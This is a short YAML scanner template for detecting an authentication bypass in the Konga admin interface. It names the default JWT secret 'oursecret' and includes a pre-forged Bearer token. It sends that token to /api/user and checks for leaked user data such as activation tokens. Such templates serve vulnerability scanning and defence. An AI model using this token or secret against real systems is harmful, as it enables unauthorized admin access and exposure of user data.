id: konga-default-jwt-key

info:
  name: KONGA Arbitrary user login vulnerability
  author: wys
  severity: high
  verified: true
  description: The default key of Konga JWT is oursecret, which can forge arbitrary user permissions
  reference:
    - https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg
    
rules:
    r0:
        request:
            method: GET
            path: /api/user
            headers: 
              authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2u7df90W1eOzNRnrsQ4  
        expression: response.status == 200 && response.body.bcontains(b'"createdUser":') && response.body.bcontains(b'"username":') && response.body.bcontains(b'"activationToken":')
expression: r0()